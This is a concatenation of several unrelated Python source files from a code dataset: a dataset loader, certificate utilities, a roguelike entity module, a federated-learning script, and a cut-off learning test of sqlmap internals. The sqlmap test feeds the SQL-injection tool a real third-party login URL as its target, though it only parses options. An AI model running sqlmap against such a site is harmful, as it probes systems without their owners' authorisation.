},ignore_index = True)\r\n\r\n round_e_time = time.time()\r\n round_time = round_e_time - round_s_time\r\n left_time_estimation(round_time, remain_workload=remain_workload)\r\n\r\n order = ['Dates','Links']\r\n link_data = link_data[order]\r\n print(link_data)\r\n link_data.to_csv('date_links.csv')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parsing_each_day_link()","sub_path":"Midterm_Project/official_version_for WINDOWS/parsing_each_day_link.py","file_name":"parsing_each_day_link.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645358149","text":"# coding=utf-8\n# This script is finished following HF's datasets' template:\n# https://github.com/huggingface/datasets/blob/master/templates/new_dataset_script.py\n# More examples as references to write a customized dataset can be found here:\n# https://github.com/huggingface/datasets/tree/master/datasets\n\nfrom __future__ import absolute_import, division, print_function\nimport json\nimport os\n\nimport datasets\n\n_CITATION = \"\"\"\\\n\n\"\"\"\n_DESCRIPTION = \"\"\"\\\n\"\"\"\n\nfrom ptt.utils import LOCAL_DATA_LOAD_DIR\n\n_TRAIN_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_train_new.json\"\n_VAL_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_dev_new.json\"\n_TEST_DOWNLOAD_URL = f\"{LOCAL_DATA_LOAD_DIR}/data/queensland_floods/2013_Queensland_Floods_test_new.json\"\n\nNORMAL_LABELS_MAP = {\"relevant\": 'relevant', \"not_relevant\": 'not relevant'}\nLABELS_MAP = {\"relevant\": 'yes', \"not_relevant\": 'no'}\n# QUESTION = \"Is this message relevant to Queensland Floods?\"\n\nclass QueenslandFloodsConfig(datasets.BuilderConfig):\n def __init__(\n self,\n **kwargs,\n ):\n super(QueenslandFloodsConfig, self).__init__(version=datasets.Version(\"0.0.0\", \"\"), **kwargs)\n\n\nclass QueenslandFloods(datasets.GeneratorBasedBuilder):\n BUILDER_CONFIGS = [\n QueenslandFloodsConfig(\n name=\"normal\",\n description=\"text as the source and sentiment label as the target\",\n ),\n QueenslandFloodsConfig(\n name=\"t2t\",\n description=\"target is the sentiment label and source is constructed by a multi-choice QA template: context: ... question: ... choices: \",\n )\n ]\n\n \"\"\"customize dataset.\"\"\"\n\n # VERSION = datasets.Version(\"0.0.0\")\n def _info(self):\n data_info = datasets.DatasetInfo(\n description=_DESCRIPTION,\n features=datasets.Features(\n {\n \"event_name\": datasets.Value(\"string\"),\n \"set_name\": datasets.Value(\"string\"),\n \"question_template\": datasets.Value(\"string\"),\n \"question\": datasets.Value(\"string\"),\n \"text\": datasets.Value(\"string\"),\n \"source\": datasets.Value(\"string\"),\n \"target\": datasets.Value(\"string\"),\n }\n ),\n supervised_keys=None,\n homepage=\"#\",\n citation=_CITATION,\n )\n return data_info\n\n def _split_generators(self, dl_manager):\n if not self.config.data_files:\n train_path = dl_manager.download_and_extract(_TRAIN_DOWNLOAD_URL)\n val_path = dl_manager.download_and_extract(_VAL_DOWNLOAD_URL)\n test_path = dl_manager.download_and_extract(_TEST_DOWNLOAD_URL)\n\n return [\n datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": train_path}),\n datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"filepath\": val_path}),\n datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"filepath\": test_path}),\n\n ]\n else:\n splits = []\n train_path = dl_manager.download_and_extract(self.config.data_files[\"train\"])\n splits.append(datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": train_path}))\n if \"validation\" in self.config.data_files:\n if os.path.isfile(self.config.data_files[\"validation\"]):\n val_path = dl_manager.download_and_extract(self.config.data_files[\"validation\"])\n splits.append(\n datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"filepath\": val_path}))\n if \"test\" in self.config.data_files:\n if os.path.isfile(self.config.data_files[\"test\"]):\n test_path = dl_manager.download_and_extract(self.config.data_files[\"test\"])\n splits.append(datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"filepath\": test_path}))\n return splits\n\n def _generate_examples(self, filepath):\n with open(filepath, encoding='utf-8') as f:\n for id_, row in enumerate(f):\n data = json.loads(row)\n if self.config.name == \"normal\":\n yield id_, {\n \"event_name\": data[\"event_name\"],\n \"set_name\": data[\"set_name\"],\n \"question_template\": data[\"question_template\"],\n \"question\": data[\"question\"],\n \"text\": data[\"text\"],\n \"source\": data[\"text\"],\n \"target\": LABELS_MAP[data[\"label\"]],\n }\n else:\n yield id_, {\n \"event_name\": data[\"event_name\"],\n \"set_name\": data[\"set_name\"],\n \"question_template\": data[\"question_template\"],\n \"question\": data[\"question\"],\n \"text\": data[\"text\"],\n \"source\": data[\"source\"],\n \"target\": data[\"target\"],\n }\n","sub_path":"data_scripts/queensland_floods.py","file_name":"queensland_floods.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"42245308","text":"\nimport time\nfrom dateutil import parser\nfrom OpenSSL import crypto\n\ndef verify_chain_of_trust(trusted_cert, root_certs):\n\n # Create and fill a X509Store wiuth trust certs\n store = crypto.X509Store()\n\n #for cert in root_certs:\n cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, root_certs)\n store.add_cert(cert_obj)\n\n # Create a X509StoreContext with the cart and trusted certs\n # and verify the chain of trust\n store_ctx = crypto.X509StoreContext(store, crypto.load_certificate(crypto.FILETYPE_PEM ,trusted_cert))\n\n result = store_ctx.verify_certificate()\n\n if result is None:\n return True\n \n return False\n\ndef get_certificate_info(cert_file):\n\n cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_file)\n cert_issue = cert.get_issuer()\n\n print (\"Certifcate version: \", cert.get_version() + 1)\n \n print (\"Certificate serial number: \", hex(cert.get_serial_number()))\n \n print (\"Certificate algorithm: \", cert.get_signature_algorithm().decode(\"UTF-8\"))\n \n print (\"issuer: \", cert_issue.commonName)\n \n datetime_struct = parser.parse(cert.get_notBefore().decode(\"UTF-8\"))\n \n print (\"issue time: \",datetime_struct.strftime('%Y-%m-%d %H:%M:%S'))\n \n datetime_struct = parser.parse(cert.get_notAfter().decode(\"UTF-8\"))\n \n print (\"exp time: \", datetime_struct.strftime('%Y-%m-%d %H:%M:%S'))\n \n print (\"expired: \", cert.has_expired())\n \n print(\"public key length: \", cert.get_pubkey().bits())\n \n print(\"public key: \\n\" , crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey()).decode(\"utf-8\"))\n \n print(\"Message main:\")\n \n print(\"CN : Common Name OU : organization unit\")\n print(\"O : organization L : geolocation\")\n print(\"S : state C : country\")\n \n for item in cert_issue.get_components():\n print(item[0].decode(\"utf-8\"), \" —— \",item[1].decode(\"utf-8\"))\n \n print(cert.get_extension_count())\n\ndef load_cert_file_stream(cert_file):\n\n with open(cert_file) as cert_file_hanlder:\n return cert_file_hanlder.read()\n\ndef get_public_key_from_certificate(cert_file):\n\n stream = load_cert_file_stream(cert_file)\n \n cert = crypto.load_certificate(crypto.FILETYPE_PEM, stream)\n \n return cert.get_pubkey().decode(\"utf-8\")\n\ndef test_verify():\n\n try: \n cert_path = '../cert/rootcert_nopassword/'\n yuxin_cert_file = 'yuxin.com.crt'\n root_cert_file = 'rootCA.crt'\n\n with open(cert_path + yuxin_cert_file, 'r') as cert_file:\n cert = cert_file.read()\n get_certificate_info(cert)\n\n with open(cert_path + root_cert_file, 'r') as rootcert_file:\n root_cert = rootcert_file.read()\n get_certificate_info(root_cert)\n\n if verify_chain_of_trust(cert, root_cert):\n print(\"Verified the root certificate \")\n\n \n except:\n print(\"Except happened\")\n\n\nclass CertUtil(object):\n \n root_certs = None\n store = None\n cert_type = {\"ASN1\": crypto.FILETYPE_ASN1, \"PEM\": crypto.FILETYPE_PEM}\n\n def __init__(self):\n pass\n\n @staticmethod\n def verify_certificate_sign_by_root(data, type = \"ASN1\"):\n\n if type not in CertUtil.cert_type and not CertUtil.root_certs:\n return False\n\n #store = crypto.X509Store()\n #store.add_cert(CertUtil.root_certs)\n\n store_ctx = crypto.X509StoreContext(CertUtil.store, crypto.load_certificate(CertUtil.cert_type[type], data))\n\n # return (False, True)[store_ctx.verify_certificate() is None]\n return True if store_ctx.verify_certificate() is None else False\n\n @staticmethod\n def extract_public_key_from_certificate(data, type=\"ASN1\"):\n \"\"\"\n extract public key from certificate, pem and der fromat\n \"\"\"\n if type not in CertUtil.cert_type:\n return None\n\n cert = crypto.load_certificate(CertUtil.cert_type[type], data)\n return cert.get_pubkey().to_cryptography_key()\n\n @staticmethod\n def import_eaadevice_rootcert(data, type = \"ASN1\"):\n \n if type not in CertUtil.cert_type:\n return False\n\n CertUtil.root_certs = crypto.load_certificate(CertUtil.cert_type[type], data)\n CertUtil.store = crypto.X509Store()\n CertUtil.store.add_cert(CertUtil.root_certs)\n return True\n\nif __name__ == \"__main__\":\n\n # test_verify()\n\n cert_path = '../cert/rootcert_nopassword/'\n yuxin_cert_file = 'yuxin.com.crt'\n root_cert_file = 'rootCA.crt'\n\n with open(cert_path + root_cert_file, 'r') as rootcert_file:\n root_cert = rootcert_file.read()\n get_certificate_info(root_cert) \n\n CertUtil.import_eaadevice_rootcert(root_cert, \"PEM\")\n\n with open(cert_path + yuxin_cert_file, 'r') as cert_file:\n cert = cert_file.read()\n get_certificate_info(cert)\n\n res = CertUtil.verify_certificate_sign_by_root(cert, \"PEM\")\n\n print(\"res = \", res)","sub_path":"Python35/App/HandleJWT/cert_pyopenssl.py","file_name":"cert_pyopenssl.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358024578","text":"from __future__ import annotations\n\nimport copy, math\nfrom typing import Optional, Tuple, Type, TypeVar, TYPE_CHECKING\n\nfrom render_order import RenderOrder\nimport tcod\nimport numpy as np\n\nif TYPE_CHECKING:\n from components.ai import BaseAI\n from components.fighter import Fighter\n from game_map import GameMap\n\nT = TypeVar(\"T\", bound=\"Entity\")\n\nfrom enum import auto, Enum\nclass Facing(Enum):\n NW = auto()\n N = auto()\n NE = auto()\n E = auto()\n SE = auto()\n S = auto()\n SW = auto()\n W = auto()\n\n @classmethod\n def get_pos(cls, f: Facing):\n map = {Facing.NW: (-1, -1), Facing.N: (0, -1), Facing.NE: (1, -1), Facing.E: (1, 0), Facing.SE: (1, 1), Facing.S: (0, 1), Facing.SW: (-1,1), Facing.W: (-1, 0)}\n return map[f]\n\n @classmethod\n def get_angle(cls, f: Facing):\n pos = cls.get_pos(f)\n return math.atan2(pos[0], pos[1])\n\n @classmethod\n def get_direction(cls,\n x1:int, y1:int,\n x2:int = 0, y2:int = 0):\n\n dx = x2-x1\n dy = y2-y1\n\n # this angle is in radians\n # 0 = up, 1=right\n angle = math.atan2(dy, dx)\n\n # i want to map this down to 0/1/-1 on two axes.\n # or maybe I'm just weak and do the map version.\n # these = are a little shaky and I'm not sure they're mutually exclusive\n if angle <= math.pi/8 and angle > -math.pi/8:\n return Facing.E\n elif angle <= 3*math.pi/8 and angle > math.pi/8:\n return Facing.SE\n elif angle <= 5*math.pi/8 and angle > 3*math.pi/8:\n return Facing.S\n elif angle <= 7*math.pi/8 and angle > 5*math.pi/8:\n return Facing.SW\n elif angle >= 7*math.pi/8 or angle < -7*math.pi/8:\n return Facing.W\n elif angle >= -3*math.pi/8 and angle < -math.pi/8:\n return Facing.NE\n elif angle >= -5*math.pi/8 and angle < -3*math.pi/8:\n return Facing.N\n elif angle >= -7*math.pi/8 and angle < -5*math.pi/8:\n return Facing.NW\n\n\n\nclass Entity:\n \"\"\"\n A generic object to represent players, enemies, items, etc.\n \"\"\"\n\n gamemap: GameMap\n\n def __init__(\n self,\n gamemap: Optional[GameMap] = None,\n x: int = 0,\n y: int = 0,\n facing: Facing = Facing.N,\n char: str = \"?\",\n color: Tuple[int, int, int] = (255, 255, 255),\n name: str = \"\",\n blocks_movement: bool = False,\n render_order: RenderOrder = RenderOrder.CORPSE,\n ):\n self.x = x\n self.y = y\n self.facing = facing\n self.char = char\n self.color = color\n self.name = name\n self.blocks_movement = blocks_movement\n self.render_order = render_order\n if gamemap:\n # If gamemap isn't provided now then it will be set later.\n self.gamemap = gamemap\n gamemap.entities.add(self)\n\n def __str__(self):\n return f'({self.name}: ({self.x}, {self.y}):{self.facing})'\n\n def spawn(self: T, gamemap: GameMap, x: int, y: int) -> T:\n \"\"\"Spawn a copy of this instance at the given location.\"\"\"\n clone = copy.deepcopy(self)\n clone.x = x\n clone.y = y\n clone.gamemap = gamemap\n gamemap.entities.add(clone)\n return clone\n\n def place(self, x: int, y: int, gamemap: Optional[GameMap] = None) -> None:\n \"\"\"Place this entitiy at a new location. Handles moving across GameMaps.\"\"\"\n self.x = x\n self.y = y\n if gamemap:\n if hasattr(self, \"gamemap\"): # Possibly uninitialized.\n self.gamemap.entities.remove(self)\n self.gamemap = gamemap\n gamemap.entities.add(self)\n\n def move(self, dx: int, dy: int) -> None:\n # Move the entity by a given amount\n self.x += dx\n self.y += dy\n\n\nclass Actor(Entity):\n def __init__(\n self,\n *,\n x: int = 0,\n y: int = 0,\n char: str = \"?\",\n color: Tuple[int, int, int] = (255, 255, 255),\n name: str = \"\",\n ai_cls: Type[BaseAI],\n fighter: Fighter,\n ):\n super().__init__(\n x=x,\n y=y,\n char=char,\n color=color,\n name=name,\n blocks_movement=True,\n render_order=RenderOrder.ACTOR,\n )\n\n self.ai: Optional[BaseAI] = ai_cls(self)\n\n self.is_player = False\n\n self.fighter = fighter\n self.fighter.entity = self\n\n # abstract into a hostile class? PC can't have a target lock i think?\n self.target_lock = None\n\n def get_visibility(self, tiles):\n visibility = tcod.map.compute_fov(\n tiles, (self.x, self.y), algorithm=1, radius=24)\n\n # now, whack it with a facing mask.\n # my meh idea for this is raytracing.\n\n # I think there's a one command way to do this but i'm lazy\n mask = np.full(tiles.shape, False)\n facing_angle = Facing.get_angle(self.facing)\n\n # I feel like there's a clever list comprehension here but...\n # ths is expensive. we only want to consider True values here\n # but I don't know how to back out from a tile to its coordinates.\n # this makes make think that ultimately tiles need unique ids not just be naked booleans?\n for x in range(0, visibility.shape[0]):\n for y in range(0, visibility.shape[1]):\n\n visible = visibility[x][y]\n if not visible:\n continue\n\n # first, compute the distance to the entity.\n # then compute the angle.\n # then set true/false based on the acceptable range for that angle.\n\n # could do this fancy with pathfinder/djikstra but fuck it, pythagoras had this worked out fine.\n distance = int(math.sqrt(math.pow(self.x-x, 2) + math.pow(self.y-y, 2)))\n\n angle = math.atan2(self.x-x, self.y-y) + math.pi\n angle_distance = min(abs(angle-facing_angle),\n 2*math.pi - (angle-facing_angle))\n\n if(angle_distance < math.pi/4):\n r = 24\n elif(angle_distance < math.pi/2):\n r = 6\n else:\n r = 2\n\n # flip it to False if it's out of range for the angle.\n if distance > r:\n visibility[x][y] = False\n\n return visibility\n\n # this is an odd way to do this. probably fine, but this was the side-effecting problem with setting AI to null.\n @property\n def is_alive(self) -> bool:\n \"\"\"Returns True as long as this actor can perform actions.\"\"\"\n return bool(self.ai)\n","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"446166911","text":"import torch\r\nimport numpy as np\r\nfrom nn_utils import DataGenerator, save_model\r\nfrom nn_models import BiLSTMModel\r\nimport os\r\nimport argparse\r\nimport time\r\nimport copy\r\nfrom fed_utils import LocalUpdate, FedAvg\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ntorch.manual_seed(0)\r\nnp.random.seed(0)\r\n\r\nparser = argparse.ArgumentParser(description='Code to train RNN and intepretable RNN models')\r\nparser.add_argument('--path', help='Path to dataset', type=str, required=True)\r\nparser.add_argument('--epochs', help='Number of epochs for which to train the model', type=int, default=10)\r\nparser.add_argument('--lr', help='Learning rate', type=float, default=1e-3)\r\nparser.add_argument('--reverse_input', help='Flag to reverse input', action='store_true')\r\nparser.add_argument('--no_cuda', dest='use_cuda', help='Flag to not use CUDA', action='store_false')\r\nparser.set_defaults(use_cuda=True)\r\nargs = parser.parse_args(['--path', 'mini_eicu_features.csv'])\r\nassert os.path.exists(args.path), 'Path to dataset does not exist'\r\n\r\nargs.batch_size = 1\r\nembedding_size = 40\r\nhidden_size = 40\r\n\r\npath1 = 'mini_eicu_features_weight_1.csv'\r\npath2 = 'mini_eicu_features_weight_2.csv'\r\npath3 = 'mini_eicu_features_weight_3.csv'\r\npath4 = 'mini_eicu_features_weight_4.csv'\r\npath5 = 'mini_eicu_features_weight_5.csv'\r\ndata_generator1 = DataGenerator(path1, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator2 = DataGenerator(path2, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator3 = DataGenerator(path3, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator4 = DataGenerator(path4, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\ndata_generator5 = DataGenerator(path5, args.batch_size, mode='train', use_cuda=args.use_cuda)\r\n\r\ndata_generator = [data_generator1, data_generator2, data_generator3, data_generator4, data_generator5]\r\n\r\nmodel_glob = BiLSTMModel(21, embedding_size, hidden_size)\r\n\r\nif args.use_cuda:\r\n model_glob = model_glob.cuda()\r\n model_glob.tensors_to_cuda()\r\n\r\nmodel_glob.train()\r\nw_glob = model_glob.state_dict()\r\n\r\n# Training\r\nloss_train = []\r\nlr_base_t0 = time.time()\r\nprint(time.localtime(lr_base_t0))\r\nfor iter in range(args.epochs):\r\n loss_locals = []\r\n w_locals = []\r\n m = 2\r\n client = np.random.choice(5, m, replace=False)\r\n for idx in client:\r\n print('i = ', idx)\r\n dataset_train = data_generator[idx]\r\n local = LocalUpdate(args=args, dataset=dataset_train)\r\n w, loss = local.train(net=copy.deepcopy(model_glob))\r\n w_locals.append(copy.deepcopy(w))\r\n loss_locals.append(loss)\r\n\r\n w_glob = FedAvg(w_locals)\r\n model_glob.load_state_dict(w_glob)\r\n\r\n loss_avg = sum(loss_locals) / len(loss_locals)\r\n print('Round {:3d}, Average loss {:.3f}'.format(iter, loss_avg))\r\n loss_train.append(loss_avg)\r\n\r\nlr_base_t1 = time.time()\r\nprint(time.localtime(lr_base_t1))\r\nsave_model(model_glob, 'fedmodels', {'embedding_size': embedding_size, 'hidden_size': hidden_size, 'lr': args.lr, 'epochs': args.epochs, 'batch_size': args.batch_size, 'reversed': args.reverse_input})\r\n","sub_path":"federated_learning.py","file_name":"federated_learning.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181319012","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom runner.koan import *\nfrom lib.core.data import paths\nfrom lib.core.common import setPaths\nfrom sqlmap import modulePath\n\nfrom lib.core.data import cmdLineOptions\nfrom lib.parse.cmdline import cmdLineParser\nfrom lib.core.option import initOptions\n\nfrom lib.core.data import kb\nfrom lib.core.data import conf\n\nfrom lib.core.data import logger\n\n\nclass AboutData(Koan):\n\n def test_paths_setPaths(self):\n self.assertEqual({}, paths)\n paths.SQLMAP_ROOT_PATH = modulePath()\n# self.assertEqual({'SQLMAP_ROOT_PATH': u'/home/k/Develop/sqlmap'}, paths)\n setPaths()\n self.maxDiff = None\n # self.assertDictContainsSubset({'COMMON_COLUMNS': u'/home/k/Develop/sqlmap/txt/common-columns.txt',\n # 'COMMON_OUTPUTS': u'/home/k/Develop/sqlmap/txt/common-outputs.txt',\n # 'COMMON_TABLES': u'/home/k/Develop/sqlmap/txt/common-tables.txt',\n # 'ERRORS_XML': u'/home/k/Develop/sqlmap/xml/errors.xml',\n # 'GENERIC_XML': u'/home/k/Develop/sqlmap/xml/banner/generic.xml',\n # 'INJECTIONS_XML': u'/home/k/Develop/sqlmap/xml/injections.xml',\n # 'LIVE_TESTS_XML': u'/home/k/Develop/sqlmap/xml/livetests.xml',\n # 'MSSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/mssql.xml',\n # 'MYSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/mysql.xml',\n # 'ORACLE_XML': u'/home/k/Develop/sqlmap/xml/banner/oracle.xml',\n # 'OS_SHELL_HISTORY': '/home/k/.sqlmap/os.hst',\n # 'PAYLOADS_XML': u'/home/k/Develop/sqlmap/xml/payloads.xml',\n # 'PGSQL_XML': u'/home/k/Develop/sqlmap/xml/banner/postgresql.xml',\n # 'QUERIES_XML': u'/home/k/Develop/sqlmap/xml/queries.xml',\n # 'SMALL_DICT': u'/home/k/Develop/sqlmap/txt/smalldict.txt',\n # #'SQLMAP_CONFIG': u'/home/k/Develop/sqlmap/sqlmap-dieD.conf',\n # 'SQLMAP_DUMP_PATH': u'/home/k/.sqlmap/output/%s/dump',\n # 'SQLMAP_EXTRAS_PATH': u'/home/k/Develop/sqlmap/extra',\n # 'SQLMAP_FILES_PATH': u'/home/k/.sqlmap/output/%s/files',\n # 'SQLMAP_OUTPUT_PATH': u'/home/k/.sqlmap/output',\n # 'SQLMAP_PROCS_PATH': u'/home/k/Develop/sqlmap/procs',\n # 'SQLMAP_ROOT_PATH': u'/home/k/Develop/sqlmap',\n # 'SQLMAP_SHELL_HISTORY': '/home/k/.sqlmap/sqlmap.hst',\n # 'SQLMAP_SHELL_PATH': u'/home/k/Develop/sqlmap/shell',\n # 'SQLMAP_TAMPER_PATH': u'/home/k/Develop/sqlmap/tamper',\n # 'SQLMAP_TXT_PATH': u'/home/k/Develop/sqlmap/txt',\n # 'SQLMAP_UDF_PATH': u'/home/k/Develop/sqlmap/udf',\n # 'SQLMAP_WAF_PATH': u'/home/k/Develop/sqlmap/waf',\n # 'SQLMAP_XML_BANNER_PATH': u'/home/k/Develop/sqlmap/xml/banner',\n # 'SQLMAP_XML_PATH': u'/home/k/Develop/sqlmap/xml',\n # 'SQL_KEYWORDS': u'/home/k/Develop/sqlmap/txt/keywords.txt',\n # 'SQL_SHELL_HISTORY': '/home/k/.sqlmap/sql.hst',\n # 'USER_AGENTS': u'/home/k/Develop/sqlmap/txt/user-agents.txt',\n # 'WORDLIST': u'/home/k/Develop/sqlmap/txt/wordlist.zip'}, paths)\n #self.assertEqual(u'/home/k/Develop/sqlmap/sqlmap-YplE.conf', paths.SQLMAP_CONFIG)\n import os\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n # self.assertEqual(u'/home/k/.sqlmap/output/sqlmap_profile.raw', profileOutputFile)\n paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"%s\", \"files\")\n # self.assertEqual(u'/home/k/.sqlmap/output/%s/files', paths.SQLMAP_FILES_PATH)\n\n # def test_cmdLineOptions_initOptions_h(self):\n # import sys\n # try:\n # sys.argv = [\"-h\"]\n # cmdLineOptions.update(cmdLineParser().__dict__)\n # initOptions(cmdLineOptions)\n # except SystemExit as e:\n # self.assertEqual(0, e[0])\n\n def test_cmdLineOptions_initOptions_xx(self):\n import sys\n self.assertEqual({}, cmdLineOptions)\n try:\n sys.argv = [\"-u\", \"https://passport.baidu.com/v2/?reg&tpl=tb&u=http://tieba.baidu.com\"]\n cmdLineOptions.update(cmdLineParser().__dict__)\n initOptions(cmdLineOptions)\n except Exception as e:\n self.assertEqual(\"unable to access item 'SQL_KEYWORDS'\", e[0])\n logger.exception(\"just test logger.exception! \")\n self.maxDiff = None\n self.assertDictEqual({'advancedHelp': None,\n 'agent': None,\n 'alert': None,\n 'answers': None,\n 'authCred': None,\n 'authPrivate': None,\n 'authType': None,\n 'batch': None,\n 'beep': None,\n 'binaryFields': None,\n 'bulkFile': None,\n 'charset': None,\n 'checkTor': None,\n 'checkWaf': None,\n 'cleanup': None,\n 'code': None,\n 'col': None,\n 'commonColumns': None,\n 'commonTables': None,\n 'configFile': None,\n 'cookie': None,\n 'cookieDel': None,\n 'cpuThrottle': None,\n 'crawlDepth': None,\n 'csvDel': None,\n 'dFile': None,\n 'data': None,\n 'db': None,\n 'dbms': None,\n 'dbmsCred': None,\n 'delay': None,\n 'dependencies': None,\n 'direct': None,\n 'disableColoring': None,\n 'dnsName': None,\n 'dropSetCookie': None,\n 'dummy': None,\n 'dumpAll': None,\n 'dumpFormat': None,\n 'dumpTable': None,\n 'dumpWhere': None,\n 'eta': None,\n 'evalCode': None,\n 'excludeCol': None,\n 'excludeSysDbs': None,\n 'extensiveFp': None,\n 'firstChar': None,\n 'flushSession': None,\n 'forceDns': None,\n 'forceSSL': None,\n 'forms': None,\n 'freshQueries': None,\n 'getAll': None,\n 'getBanner': None,\n 'getColumns': None,\n 'getComments': None,\n 'getCount': None,\n 'getCurrentDb': None,\n 'getCurrentUser': None,\n 'getDbs': None,\n 'getHostname': None,\n 'getPasswordHashes': None,\n 'getPrivileges': None,\n 'getRoles': None,\n 'getSchema': None,\n 'getTables': None,\n 'getUsers': None,\n 'googleDork': None,\n 'googlePage': None,\n 'headers': None,\n 'hexConvert': None,\n 'host': None,\n 'hpp': None,\n 'identifyWaf': None,\n 'ignore401': None,\n 'ignoreProxy': None,\n 'invalidBignum': None,\n 'invalidLogical': None,\n 'invalidString': None,\n 'isDba': None,\n 'keepAlive': None,\n 'lastChar': None,\n 'level': None,\n 'limitStart': None,\n 'limitStop': None,\n 'liveTest': None,\n 'loadCookies': None,\n 'logFile': None,\n 'mnemonics': None,\n 'mobile': None,\n 'msfPath': None,\n 'noCast': None,\n 'noEscape': None,\n 'notString': None,\n 'nullConnection': None,\n 'optimize': None,\n 'os': None,\n 'osBof': None,\n 'osCmd': None,\n 'osPwn': None,\n 'osShell': None,\n 'osSmb': None,\n 'outputDir': None,\n 'pageRank': None,\n 'paramDel': None,\n 'parseErrors': None,\n 'pickledOptions': None,\n 'pivotColumn': None,\n 'predictOutput': None,\n 'prefix': None,\n 'privEsc': None,\n 'profile': None,\n 'proxy': None,\n 'proxyCred': None,\n 'proxyFile': None,\n 'purgeOutput': None,\n 'query': None,\n 'rFile': None,\n 'rParam': None,\n 'randomAgent': None,\n 'referer': None,\n 'regAdd': None,\n 'regData': None,\n 'regDel': None,\n 'regKey': None,\n 'regRead': None,\n 'regType': None,\n 'regVal': None,\n 'regexp': None,\n 'requestFile': None,\n 'retries': None,\n 'risk': None,\n 'runCase': None,\n 'saFreq': None,\n 'safUrl': None,\n 'saveCmdline': None,\n 'scope': None,\n 'search': None,\n 'secondOrder': None,\n 'sessionFile': None,\n 'shLib': None,\n 'showVersion': None,\n 'sitemapUrl': None,\n 'skip': None,\n 'skipUrlEncode': None,\n 'smart': None,\n 'smokeTest': None,\n 'sqlFile': None,\n 'sqlShell': None,\n 'sqlmapShell': None,\n 'stopFail': None,\n 'string': None,\n 'suffix': None,\n 'tamper': None,\n 'tbl': None,\n 'tech': None,\n 'testFilter': None,\n 'testParameter': None,\n 'textOnly': None,\n 'threads': None,\n 'timeSec': None,\n 'timeout': None,\n 'titles': None,\n 'tmpPath': None,\n 'tor': None,\n 'torPort': None,\n 'torType': None,\n 'trafficFile': None,\n 'uChar': None,\n 'uCols': None,\n 'uFrom': None,\n 'udfInject': None,\n 'updateAll': None,\n 'url': u'https://passport.baidu.com/v2/?reg&tpl=tb&u=http://tieba.baidu.com',\n 'user': None,\n 'verbose': None,\n 'wFile': None,\n 'wizard': None}, cmdLineOptions)\n self.assertDictEqual({'authPassword': None,\n 'authUsername': None,\n 'boundaries': [],\n 'cj': None,\n 'dbmsConnector': None,\n 'dbmsHandler': None,\n 'dnsServer': None,\n 'dumpPath': None,\n 'hashDB': None,\n 'hashDBFile': None,\n 'hostname': None,\n 'httpHeaders': [],\n 'ipv6': False,\n 'multipleTargets': False,\n 'outputPath': None,\n 'paramDict': {},\n 'parameters': {},\n 'path': None,\n 'port': None,\n 'proxyList': [],\n 'resultsFP': None,\n 'resultsFilename': None,\n 'scheme': None,\n 'tests': [],\n 'trafficFP': None,\n 'wFileType': None}, conf)\n # https://docs.python.org/2/howto/logging.html?highlight=logger#logging-howto\n def test_logger(self):\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', '__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__',\n '__subclasshook__', '__weakref__', '_log', 'addFilter',\n 'addHandler', 'callHandlers', 'critical', 'debug',\n 'disabled', 'error', 'exception', 'fatal', 'filter',\n 'filters', 'findCaller', 'getChild', 'getEffectiveLevel',\n 'handle', 'handlers', 'info', 'isEnabledFor', 'level', 'log',\n 'makeRecord', 'manager', 'name', 'parent', 'propagate',\n 'removeFilter', 'removeHandler', 'root', 'setLevel', 'warn',\n 'warning'], dir(logger))\n logger.debug(\"DEBUG message goes\")\n logger.info(\"INFO message goes\")\n self.assertEqual(False, logger == logger.root)\n self.assertEqual(\"sqlmapLog\", logger.name)\n self.assertEqual(30, logger.level)\n self.assertEqual(30, logger.getEffectiveLevel())\n self.assertEqual(False, logger.isEnabledFor(29))\n self.assertEqual(True, logger.isEnabledFor(31))\n self.assertEqual(1, logger.propagate)\n # logging.Manager\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', '__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__',\n '__subclasshook__', '__weakref__', '_fixupChildren',\n 